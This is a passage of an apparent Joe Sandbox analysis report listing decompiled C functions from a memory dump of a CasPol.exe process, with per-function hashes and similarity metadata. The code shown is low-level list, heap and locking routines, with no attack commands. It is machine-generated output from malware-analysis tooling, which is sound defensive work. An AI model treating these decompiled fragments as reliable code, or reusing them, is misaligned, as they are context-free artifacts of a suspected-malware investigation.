                                                                                                                                                                                                                                                                                                				return _t44;
                                                                                                                                                                                                                                                                                                			}













                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 6fdce755023df357802fbe044d53e757b1c4572dc79906472c77a9eedec118fa
                                                                                                                                                                                                                                                                                                • Instruction ID: 7acfdf19f4b641586f978b7f54ddef2e57929f0541fd0fc8b0d29ff88cbe0426
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6fdce755023df357802fbe044d53e757b1c4572dc79906472c77a9eedec118fa
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B9219F72A00109AFC715DF58DD81F5AFBBDFB45748F1500A8EA09AB251D771EE01DB90
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                C-Code - Quality: 54%
                                                                                                                                                                                                                                                                                                			E0175B390(void* __ecx, intOrPtr _a4) {
                                                                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                                                                				signed char _t12;
                                                                                                                                                                                                                                                                                                				signed int _t16;
                                                                                                                                                                                                                                                                                                				signed int _t21;
                                                                                                                                                                                                                                                                                                				void* _t28;
                                                                                                                                                                                                                                                                                                				signed int _t30;
                                                                                                                                                                                                                                                                                                				signed int _t36;
                                                                                                                                                                                                                                                                                                				signed int _t41;
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                                                                                                                				_t41 = _a4 + 0xffffffb8;
                                                                                                                                                                                                                                                                                                				E01742280(_t12, 0x1818608);
                                                                                                                                                                                                                                                                                                				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
                                                                                                                                                                                                                                                                                                				asm("sbb edi, edi");
                                                                                                                                                                                                                                                                                                				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
                                                                                                                                                                                                                                                                                                				_v8 = _t36;
                                                                                                                                                                                                                                                                                                				asm("lock cmpxchg [ebx], ecx");
                                                                                                                                                                                                                                                                                                				_t30 = 1;
                                                                                                                                                                                                                                                                                                				if(1 != 1) {
                                                                                                                                                                                                                                                                                                					while(1) {
                                                                                                                                                                                                                                                                                                						_t21 = _t30 & 0x00000006;
                                                                                                                                                                                                                                                                                                						_t16 = _t30;
                                                                                                                                                                                                                                                                                                						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
                                                                                                                                                                                                                                                                                                						asm("lock cmpxchg [edi], esi");
                                                                                                                                                                                                                                                                                                						if(_t16 == _t30) {
                                                                                                                                                                                                                                                                                                							break;
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                						_t30 = _t16;
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                					_t36 = _v8;
                                                                                                                                                                                                                                                                                                					if(_t21 == 2) {
                                                                                                                                                                                                                                                                                                						_t16 = E017600C2(0x1818608, 0, _t28);
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                				if(_t36 != 0) {
                                                                                                                                                                                                                                                                                                					_t16 = L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                				return _t16;
                                                                                                                                                                                                                                                                                                			}












                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 59e40bf2916d914b90ca7b08f1e27132bf9d661a06d4fa7b4e28442a6f076857
                                                                                                                                                                                                                                                                                                • Instruction ID: 2252f86ce0242fbf755ca16ac2f976fe110e5ab22322c76f0f2f35eb9109947f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 59e40bf2916d914b90ca7b08f1e27132bf9d661a06d4fa7b4e28442a6f076857
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F81166333061109FCB29CA189D81A3BF26BEBD6370F290139EE16D7391CA71AC06C690
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                C-Code - Quality: 77%
                                                                                                                                                                                                                                                                                                			E01729240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                                                                                				intOrPtr _t33;
                                                                                                                                                                                                                                                                                                				intOrPtr _t37;
                                                                                                                                                                                                                                                                                                				intOrPtr _t41;
                                                                                                                                                                                                                                                                                                				intOrPtr* _t46;
                                                                                                                                                                                                                                                                                                				void* _t48;
                                                                                                                                                                                                                                                                                                				intOrPtr _t50;
                                                                                                                                                                                                                                                                                                				intOrPtr* _t60;
                                                                                                                                                                                                                                                                                                				void* _t61;
                                                                                                                                                                                                                                                                                                				intOrPtr _t62;
                                                                                                                                                                                                                                                                                                				intOrPtr _t65;
                                                                                                                                                                                                                                                                                                				void* _t66;
                                                                                                                                                                                                                                                                                                				void* _t68;
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				_push(0xc);
                                                                                                                                                                                                                                                                                                				_push(0x17ff708);
                                                                                                                                                                                                                                                                                                				E0177D08C(__ebx, __edi, __esi);
                                                                                                                                                                                                                                                                                                				_t65 = __ecx;
                                                                                                                                                                                                                                                                                                				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
                                                                                                                                                                                                                                                                                                				if( *(__ecx + 0x24) != 0) {
                                                                                                                                                                                                                                                                                                					_push( *(__ecx + 0x24));
                                                                                                                                                                                                                                                                                                					E017695D0();
                                                                                                                                                                                                                                                                                                					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                				L6();
                                                                                                                                                                                                                                                                                                				L6();
                                                                                                                                                                                                                                                                                                				_push( *((intOrPtr*)(_t65 + 0x28)));
                                                                                                                                                                                                                                                                                                				E017695D0();
                                                                                                                                                                                                                                                                                                				_t33 =  *0x18184c4; // 0x0
                                                                                                                                                                                                                                                                                                				L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
                                                                                                                                                                                                                                                                                                				_t37 =  *0x18184c4; // 0x0
                                                                                                                                                                                                                                                                                                				L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
                                                                                                                                                                                                                                                                                                				_t41 =  *0x18184c4; // 0x0
                                                                                                                                                                                                                                                                                                				E01742280(L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x18186b4);
                                                                                                                                                                                                                                                                                                				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
                                                                                                                                                                                                                                                                                                				_t46 = _t65 + 0xe8;
                                                                                                                                                                                                                                                                                                				_t62 =  *_t46;
                                                                                                                                                                                                                                                                                                				_t60 =  *((intOrPtr*)(_t46 + 4));
                                                                                                                                                                                                                                                                                                				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
                                                                                                                                                                                                                                                                                                					_t61 = 3;
                                                                                                                                                                                                                                                                                                					asm("int 0x29");
                                                                                                                                                                                                                                                                                                					_push(_t65);
                                                                                                                                                                                                                                                                                                					_t66 = _t61;
                                                                                                                                                                                                                                                                                                					_t23 = _t66 + 0x14; // 0x8df8084c
                                                                                                                                                                                                                                                                                                					_push( *_t23);
                                                                                                                                                                                                                                                                                                					E017695D0();
                                                                                                                                                                                                                                                                                                					_t24 = _t66 + 0x10; // 0x89e04d8b
                                                                                                                                                                                                                                                                                                					_push( *_t24);
                                                                                                                                                                                                                                                                                                					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
                                                                                                                                                                                                                                                                                                					_t48 = E017695D0();
                                                                                                                                                                                                                                                                                                					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
                                                                                                                                                                                                                                                                                                					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
                                                                                                                                                                                                                                                                                                					return _t48;
                                                                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                                                                					 *_t60 = _t62;
                                                                                                                                                                                                                                                                                                					 *((intOrPtr*)(_t62 + 4)) = _t60;
                                                                                                                                                                                                                                                                                                					 *(_t68 - 4) = 0xfffffffe;
                                                                                                                                                                                                                                                                                                					E01729325();
                                                                                                                                                                                                                                                                                                					_t50 =  *0x18184c4; // 0x0
                                                                                                                                                                                                                                                                                                					return E0177D0D1(L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                			}















                                                                                                                                                                                                                                                                                                0x01729332
                                                                                                                                                                                                                                                                                                0x01729333
                                                                                                                                                                                                                                                                                                0x01729337
                                                                                                                                                                                                                                                                                                0x01729338
                                                                                                                                                                                                                                                                                                0x0172933a
                                                                                                                                                                                                                                                                                                0x0172933a
                                                                                                                                                                                                                                                                                                0x0172933d
                                                                                                                                                                                                                                                                                                0x01729342
                                                                                                                                                                                                                                                                                                0x01729342
                                                                                                                                                                                                                                                                                                0x01729345
                                                                                                                                                                                                                                                                                                0x01729349
                                                                                                                                                                                                                                                                                                0x0172934e
                                                                                                                                                                                                                                                                                                0x01729352
                                                                                                                                                                                                                                                                                                0x01729357
                                                                                                                                                                                                                                                                                                0x017292f4
                                                                                                                                                                                                                                                                                                0x017292f4
                                                                                                                                                                                                                                                                                                0x017292f6
                                                                                                                                                                                                                                                                                                0x017292f9
                                                                                                                                                                                                                                                                                                0x01729300
                                                                                                                                                                                                                                                                                                0x01729306
                                                                                                                                                                                                                                                                                                0x01729324
                                                                                                                                                                                                                                                                                                0x01729324

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 5475215c2ad370f52b72b6e207af15b202413137d51c00b800fbfdd4e67b14b3
                                                                                                                                                                                                                                                                                                • Instruction ID: c9ec76b3c755baf9f2ce23a9f67b1106dea89da42b33b5b99ba81b24c32d53a9
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5475215c2ad370f52b72b6e207af15b202413137d51c00b800fbfdd4e67b14b3
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5C215932040611DFC726EF68CA84F1AF7B9FF18708F14456CE209866A6CB34E942CB44
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                C-Code - Quality: 90%
                                                                                                                                                                                                                                                                                                			E017B4257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                                                                                				intOrPtr* _t18;
                                                                                                                                                                                                                                                                                                				intOrPtr _t24;
                                                                                                                                                                                                                                                                                                				intOrPtr* _t27;
                                                                                                                                                                                                                                                                                                				intOrPtr* _t30;
                                                                                                                                                                                                                                                                                                				intOrPtr* _t31;
                                                                                                                                                                                                                                                                                                				intOrPtr _t33;
                                                                                                                                                                                                                                                                                                				intOrPtr* _t34;
                                                                                                                                                                                                                                                                                                				intOrPtr* _t35;
                                                                                                                                                                                                                                                                                                				void* _t37;
                                                                                                                                                                                                                                                                                                				void* _t38;
                                                                                                                                                                                                                                                                                                				void* _t39;
                                                                                                                                                                                                                                                                                                				void* _t43;
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				_t39 = __eflags;
                                                                                                                                                                                                                                                                                                				_t35 = __edi;
                                                                                                                                                                                                                                                                                                				_push(8);
                                                                                                                                                                                                                                                                                                				_push(0x18008d0);
                                                                                                                                                                                                                                                                                                				E0177D08C(__ebx, __edi, __esi);
                                                                                                                                                                                                                                                                                                				_t37 = __ecx;
                                                                                                                                                                                                                                                                                                				E017B41E8(__ebx, __edi, __ecx, _t39);
                                                                                                                                                                                                                                                                                                				L0173EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                                                                                                                                                                                                                                                				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
                                                                                                                                                                                                                                                                                                				_t18 = _t37 + 8;
                                                                                                                                                                                                                                                                                                				_t33 =  *_t18;
                                                                                                                                                                                                                                                                                                				_t27 =  *((intOrPtr*)(_t18 + 4));
                                                                                                                                                                                                                                                                                                				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
                                                                                                                                                                                                                                                                                                					L8:
                                                                                                                                                                                                                                                                                                					_push(3);
                                                                                                                                                                                                                                                                                                					asm("int 0x29");
                                                                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                                                                					 *_t27 = _t33;
                                                                                                                                                                                                                                                                                                					 *((intOrPtr*)(_t33 + 4)) = _t27;
                                                                                                                                                                                                                                                                                                					_t35 = 0x18187e4;
                                                                                                                                                                                                                                                                                                					_t18 =  *0x18187e0; // 0x0
                                                                                                                                                                                                                                                                                                					while(_t18 != 0) {
                                                                                                                                                                                                                                                                                                						_t43 = _t18 -  *0x1815cd0; // 0xffffffff
                                                                                                                                                                                                                                                                                                						if(_t43 >= 0) {
                                                                                                                                                                                                                                                                                                							_t31 =  *0x18187e4; // 0x0
                                                                                                                                                                                                                                                                                                							_t18 =  *_t31;
                                                                                                                                                                                                                                                                                                							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
                                                                                                                                                                                                                                                                                                								goto L8;
                                                                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                                                                								 *0x18187e4 = _t18;
                                                                                                                                                                                                                                                                                                								 *((intOrPtr*)(_t18 + 4)) = _t35;
                                                                                                                                                                                                                                                                                                								L01727055(_t31 + 0xfffffff8);
                                                                                                                                                                                                                                                                                                								_t24 =  *0x18187e0; // 0x0
                                                                                                                                                                                                                                                                                                								_t18 = _t24 - 1;
                                                                                                                                                                                                                                                                                                								 *0x18187e0 = _t18;
                                                                                                                                                                                                                                                                                                								continue;
                                                                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                						goto L9;
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                				L9:
                                                                                                                                                                                                                                                                                                				__eflags =  *0x1815cd0;
                                                                                                                                                                                                                                                                                                				if( *0x1815cd0 <= 0) {
                                                                                                                                                                                                                                                                                                					L01727055(_t37);
                                                                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                                                                					_t30 = _t37 + 8;
                                                                                                                                                                                                                                                                                                					_t34 =  *0x18187e8; // 0x0
                                                                                                                                                                                                                                                                                                					__eflags =  *_t34 - _t35;
                                                                                                                                                                                                                                                                                                					if( *_t34 != _t35) {
                                                                                                                                                                                                                                                                                                						goto L8;
                                                                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                                                                						 *_t30 = _t35;
                                                                                                                                                                                                                                                                                                						 *((intOrPtr*)(_t30 + 4)) = _t34;
                                                                                                                                                                                                                                                                                                						 *_t34 = _t30;
                                                                                                                                                                                                                                                                                                						 *0x18187e8 = _t30;
                                                                                                                                                                                                                                                                                                						 *0x18187e0 = _t18 + 1;
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                				 *(_t38 - 4) = 0xfffffffe;
                                                                                                                                                                                                                                                                                                				return E0177D0D1(L017B4320());
                                                                                                                                                                                                                                                                                                			}
















                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 6df6779b97b4c0148ad2284616b737677563628fa2e6369f9edc489f896bebb6
                                                                                                                                                                                                                                                                                                • Instruction ID: 48840221ef799211a4fb714d875e1a22672f2e30f4a8d2cc6e7bd1392c489297
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6df6779b97b4c0148ad2284616b737677563628fa2e6369f9edc489f896bebb6
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 10218872901601CFCB26DF68D084B94FBA4FB86354B5486AAC1578B39ADB308692CF40
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                C-Code - Quality: 42%
                                                                                                                                                                                                                                                                                                			E0172C962(char __ecx) {
                                                                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                                                                				intOrPtr _v12;
                                                                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                                                                				void* _t19;
                                                                                                                                                                                                                                                                                                				char _t22;
                                                                                                                                                                                                                                                                                                				void* _t26;
                                                                                                                                                                                                                                                                                                				void* _t27;
                                                                                                                                                                                                                                                                                                				char _t32;
                                                                                                                                                                                                                                                                                                				char _t34;
                                                                                                                                                                                                                                                                                                				void* _t35;
                                                                                                                                                                                                                                                                                                				void* _t37;
                                                                                                                                                                                                                                                                                                				intOrPtr* _t38;
                                                                                                                                                                                                                                                                                                				signed int _t39;
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				_t41 = (_t39 & 0xfffffff8) - 0xc;
                                                                                                                                                                                                                                                                                                				_v8 =  *0x181d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
                                                                                                                                                                                                                                                                                                				_t34 = __ecx;
                                                                                                                                                                                                                                                                                                				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
                                                                                                                                                                                                                                                                                                					_t26 = 0;
                                                                                                                                                                                                                                                                                                					L0173EEF0(0x18170a0);
                                                                                                                                                                                                                                                                                                					_t29 =  *((intOrPtr*)(_t34 + 0x18));
                                                                                                                                                                                                                                                                                                					if(L017AF625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
                                                                                                                                                                                                                                                                                                						L9:
                                                                                                                                                                                                                                                                                                						E0173EB70(_t29, 0x18170a0);
                                                                                                                                                                                                                                                                                                						_t19 = _t26;
                                                                                                                                                                                                                                                                                                						L2:
                                                                                                                                                                                                                                                                                                						_pop(_t35);
                                                                                                                                                                                                                                                                                                						_pop(_t37);
                                                                                                                                                                                                                                                                                                						_pop(_t27);
                                                                                                                                                                                                                                                                                                						return L0176B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                					_t29 = _t34;
                                                                                                                                                                                                                                                                                                					_t26 = E017AF1FC(_t34, _t32);
                                                                                                                                                                                                                                                                                                					if(_t26 < 0) {
                                                                                                                                                                                                                                                                                                						goto L9;
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                					_t38 =  *0x18170c0; // 0x0
                                                                                                                                                                                                                                                                                                					while(_t38 != 0x18170c0) {
                                                                                                                                                                                                                                                                                                						_t22 =  *((intOrPtr*)(_t38 + 0x18));
                                                                                                                                                                                                                                                                                                						_t38 =  *_t38;
                                                                                                                                                                                                                                                                                                						_v12 = _t22;
                                                                                                                                                                                                                                                                                                						if(_t22 != 0) {
                                                                                                                                                                                                                                                                                                							_t29 = _t22;
                                                                                                                                                                                                                                                                                                							 *0x181b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
                                                                                                                                                                                                                                                                                                							_v12();
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                					goto L9;
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                				_t19 = 0;
                                                                                                                                                                                                                                                                                                				goto L2;
                                                                                                                                                                                                                                                                                                			}



















                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 4edbef1d0bd4cd75667f0bcace253af28d3de3c721fd301231c86b90909e6463
                                                                                                                                                                                                                                                                                                • Instruction ID: c86d5bed9deca19a1e89c9243b969e4a693398b2e2ce1fe2bebdd5499a46521a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4edbef1d0bd4cd75667f0bcace253af28d3de3c721fd301231c86b90909e6463
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2811C2323107469BCB15AF2CEC89A2AF7A9BF95710B00052DE94193655DB20EE18CBD1
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                C-Code - Quality: 69%
                                                                                                                                                                                                                                                                                                			E01729080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                                                                                				intOrPtr* _t51;
                                                                                                                                                                                                                                                                                                				intOrPtr _t59;
                                                                                                                                                                                                                                                                                                				signed int _t64;
                                                                                                                                                                                                                                                                                                				signed int _t67;
                                                                                                                                                                                                                                                                                                				signed int* _t71;
                                                                                                                                                                                                                                                                                                				signed int _t74;
                                                                                                                                                                                                                                                                                                				signed int _t77;
                                                                                                                                                                                                                                                                                                				signed int _t82;
                                                                                                                                                                                                                                                                                                				intOrPtr* _t84;
                                                                                                                                                                                                                                                                                                				void* _t85;
                                                                                                                                                                                                                                                                                                				intOrPtr* _t87;
                                                                                                                                                                                                                                                                                                				void* _t94;
                                                                                                                                                                                                                                                                                                				signed int _t95;
                                                                                                                                                                                                                                                                                                				intOrPtr* _t97;
                                                                                                                                                                                                                                                                                                				signed int _t99;
                                                                                                                                                                                                                                                                                                				signed int _t102;
                                                                                                                                                                                                                                                                                                				void* _t104;
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				_push(__ebx);
                                                                                                                                                                                                                                                                                                				_push(__esi);
                                                                                                                                                                                                                                                                                                				_push(__edi);
                                                                                                                                                                                                                                                                                                				_t97 = __ecx;
                                                                                                                                                                                                                                                                                                				_t102 =  *(__ecx + 0x14);
                                                                                                                                                                                                                                                                                                				if((_t102 & 0x02ffffff) == 0x2000000) {
                                                                                                                                                                                                                                                                                                					_t102 = _t102 | 0x000007d0;
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                				_t48 =  *[fs:0x30];
                                                                                                                                                                                                                                                                                                				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                                                                                                                                                                                                                                                                                                					_t102 = _t102 & 0xff000000;
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                				_t80 = 0x18185ec;
                                                                                                                                                                                                                                                                                                				E01742280(_t48, 0x18185ec);
                                                                                                                                                                                                                                                                                                				_t51 =  *_t97 + 8;
                                                                                                                                                                                                                                                                                                				if( *_t51 != 0) {
                                                                                                                                                                                                                                                                                                					L6:
                                                                                                                                                                                                                                                                                                					return L0173FFB0(_t80, _t97, _t80);
                                                                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                                                                					 *(_t97 + 0x14) = _t102;
                                                                                                                                                                                                                                                                                                					_t84 =  *0x181538c; // 0x77e46828
                                                                                                                                                                                                                                                                                                					if( *_t84 != 0x1815388) {
                                                                                                                                                                                                                                                                                                						_t85 = 3;
                                                                                                                                                                                                                                                                                                						asm("int 0x29");
                                                                                                                                                                                                                                                                                                						asm("int3");
                                                                                                                                                                                                                                                                                                						asm("int3");
                                                                                                                                                                                                                                                                                                						asm("int3");
                                                                                                                                                                                                                                                                                                						asm("int3");
                                                                                                                                                                                                                                                                                                						asm("int3");
                                                                                                                                                                                                                                                                                                						asm("int3");
                                                                                                                                                                                                                                                                                                						asm("int3");
                                                                                                                                                                                                                                                                                                						asm("int3");
                                                                                                                                                                                                                                                                                                						asm("int3");
                                                                                                                                                                                                                                                                                                						asm("int3");
                                                                                                                                                                                                                                                                                                						asm("int3");
                                                                                                                                                                                                                                                                                                						asm("int3");
                                                                                                                                                                                                                                                                                                						_push(0x2c);
                                                                                                                                                                                                                                                                                                						_push(0x17ff6e8);
                                                                                                                                                                                                                                                                                                						E0177D0E8(0x18185ec, _t97, _t102);
                                                                                                                                                                                                                                                                                                						 *((char*)(_t104 - 0x1d)) = 0;
                                                                                                                                                                                                                                                                                                						_t99 =  *(_t104 + 8);
                                                                                                                                                                                                                                                                                                						__eflags = _t99;
                                                                                                                                                                                                                                                                                                						if(_t99 == 0) {
                                                                                                                                                                                                                                                                                                							L13:
                                                                                                                                                                                                                                                                                                							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                                                                                                                                                                                                                                                                                							if(__eflags == 0) {
                                                                                                                                                                                                                                                                                                								E017F88F5(_t80, _t85, 0x1815388, _t99, _t102, __eflags);
                                                                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                                                                							__eflags = _t99 -  *0x18186c0; // 0x11607b0
                                                                                                                                                                                                                                                                                                							if(__eflags == 0) {
                                                                                                                                                                                                                                                                                                								goto L13;
                                                                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                                                                								__eflags = _t99 -  *0x18186b8; // 0x0
                                                                                                                                                                                                                                                                                                								if(__eflags == 0) {
                                                                                                                                                                                                                                                                                                									goto L13;
                                                                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                                                                									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
                                                                                                                                                                                                                                                                                                									__eflags =  *((char*)(_t59 + 0x28));
                                                                                                                                                                                                                                                                                                									if( *((char*)(_t59 + 0x28)) == 0) {
                                                                                                                                                                                                                                                                                                										E01742280(_t99 + 0xe0, _t99 + 0xe0);
                                                                                                                                                                                                                                                                                                										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
                                                                                                                                                                                                                                                                                                										__eflags =  *((char*)(_t99 + 0xe5));
                                                                                                                                                                                                                                                                                                										if(__eflags != 0) {
                                                                                                                                                                                                                                                                                                											E017F88F5(0x18185ec, _t85, 0x1815388, _t99, _t102, __eflags);
                                                                                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                                                                                											__eflags =  *((char*)(_t99 + 0xe4));
                                                                                                                                                                                                                                                                                                											if( *((char*)(_t99 + 0xe4)) == 0) {
                                                                                                                                                                                                                                                                                                												 *((char*)(_t99 + 0xe4)) = 1;
                                                                                                                                                                                                                                                                                                												_push(_t99);
                                                                                                                                                                                                                                                                                                												_push( *((intOrPtr*)(_t99 + 0x24)));
                                                                                                                                                                                                                                                                                                												L0176AFD0();
                                                                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                                                                											while(1) {
                                                                                                                                                                                                                                                                                                												_t71 = _t99 + 8;
                                                                                                                                                                                                                                                                                                												 *(_t104 - 0x2c) = _t71;
                                                                                                                                                                                                                                                                                                												_t80 =  *_t71;
                                                                                                                                                                                                                                                                                                												_t95 = _t71[1];
